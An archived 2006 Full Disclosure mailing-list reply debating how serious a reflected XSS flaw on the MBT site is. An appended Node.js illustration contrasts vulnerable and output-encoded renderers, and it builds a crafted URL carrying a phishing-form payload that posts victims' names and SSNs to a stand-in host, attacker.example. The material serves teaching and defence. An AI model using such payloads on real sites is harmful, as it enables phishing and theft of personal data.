Full Disclosure mailing list archives
Re: MBT Xss vulnerability
From: Stan Bubrouski <stan.bubrouski () gmail com>
Date: Fri, 20 Jan 2006 16:57:17 -0500
On 1/20/06, Morning Wood <se_cur_ity () hotmail com> wrote:

> In all honesty, XSS is a serious vector of attack. However, non-persistent XSS is a much less serious problem than persistent XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed URL string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistent nature of the flaw at one dedicated site.

Unless that site is trusted by hundreds of thousands or millions of people; then something minor can be made much more serious. For instance, in this case someone could create a form for phishing purposes that looks like a job application and mail it to millions of people who think that it's from MBT.

> Issues come into play via persistent XSS, which is script that may be embedded in a web application, such as a guestbook or comment section, where people would travel on their own without the need of a direct link, and which is then rendered upon visitation in the user's browser. Further, in today's world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gained and is often of minor importance and information. What is bad is leveraging XSS as a vector for browser exploitation (can we say IFRAME+WMF), so you have a way, via XSS, to COMPROMISE end users' systems. While the OP does have a valid initial point and theory,
> 1. it is not persistent in nature
> 2. it is one site, and not a script used on many sites

Yes, that's what I was thinking, but apparently a lot of people use it; at least that's the gist I got.

> 3. it does require SE at some level to be effective
> 4. it should not have been posted to FD (see points 1, 2, 3)

This was my concern in previous replies. Why should XSS on one site be posted here, when, as the list maintainer stated previously, XSS in big sites like Google or Yahoo is pertinent to this list due to the large number of people they can affect? Assuming the author is correct about it possibly affecting millions of people, then its relevance to this list is clearly satisfied. -sb

> my2bits, MW
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
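The thread argues over reflected (non-persistent) versus stored (persistent) XSS and over how a reflected flaw on a trusted site can be turned into a phishing form delivered by a crafted link. The following Node.js snippet is an added illustration, not code from the thread, from MBT or from the original advisory: it shows a minimal server-side template that reflects a search parameter, the same flaw in a guestbook that renders stored entries, the crafted URL an attacker would have to get a victim to follow in the reflected case, and the output-encoding fix. The host names (jobs.example, attacker.example), the `q` parameter, the page markup and the form payload are all constructed assumptions for the demonstration.

```javascript
// Added example, not from the thread or from the MBT site.
// All host names, parameter names, markup and the payload are constructed.

// Minimal HTML entity encoding, safe for text nodes and double-quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected (non-persistent) case: a job-search page echoes the query
// parameter into the HTML. The payload only runs for users who follow a
// crafted URL, which is why this class depends on social engineering.
function renderSearchPageVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

function renderSearchPageFixed(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Stored (persistent) case: a guestbook renders entries from storage.
// Every visitor to the page gets the payload; no crafted link is needed.
function renderGuestbookVulnerable(entries) {
  return '<ul>' + entries.map(e => `<li>${e}</li>`).join('') + '</ul>';
}

function renderGuestbookFixed(entries) {
  return '<ul>' + entries.map(e => `<li>${escapeHtml(e)}</li>`).join('') + '</ul>';
}

// Constructed payload of the kind the thread describes: a fake "job
// application" form whose action points at a hypothetical attacker host, so
// whatever the victim types is posted to the attacker, under the real site's origin.
const PHISHING_FORM =
  '<form action="https://attacker.example/collect" method="POST">' +
  'Name <input name="n"> SSN <input name="ssn"> <input type="submit"></form>';

// The "dedicated, pre-formed URL string" the quoted message refers to.
// jobs.example and /search?q= are assumptions, not the real site's paths.
function buildReflectedUrl(payload) {
  const u = new URL('https://jobs.example/search');
  u.searchParams.set('q', payload);
  return u.toString();
}

// What the server does with such a URL: pull the parameter out and render.
function serveSearch(urlString, render) {
  const q = new URL(urlString).searchParams.get('q') || '';
  return render(q);
}

// Did the rendered page contain a live (unencoded) form element?
function containsLiveForm(html) {
  return /<form\b/i.test(html);
}

// Run both variants against the crafted link and report what each rendered.
function demo() {
  const url = buildReflectedUrl(PHISHING_FORM);
  return {
    url,
    reflectedVulnerable: containsLiveForm(serveSearch(url, renderSearchPageVulnerable)),
    reflectedFixed: containsLiveForm(serveSearch(url, renderSearchPageFixed)),
    storedVulnerable: containsLiveForm(renderGuestbookVulnerable(['hello', PHISHING_FORM])),
    storedFixed: containsLiveForm(renderGuestbookFixed(['hello', PHISHING_FORM])),
  };
}

console.log(demo());
```

The practical difference the thread is arguing about shows up in `buildReflectedUrl`: the reflected payload lives entirely in the link, so the attacker must get each victim to click it (mail it out as a "job application" from the trusted domain), whereas the guestbook variant fires for anyone who simply visits. The fix is the same in both cases: encode untrusted data at the point it is written into HTML, as `escapeHtml` does, rather than trying to filter the input.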
Current thread:
- MBT Xss vulnerability MuNNa (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
- Re: MBT Xss vulnerability greybrimstone (Jan 19)
- Re: MBT Xss vulnerability MuNNa (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability MuNNa (Jan 20)
- Re: MBT Xss vulnerability Morning Wood (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability MuNNa (Jan 21)
- Re: MBT Xss vulnerability Native.Code (Jan 22)
- Re: MBT Xss vulnerability greybrimstone (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)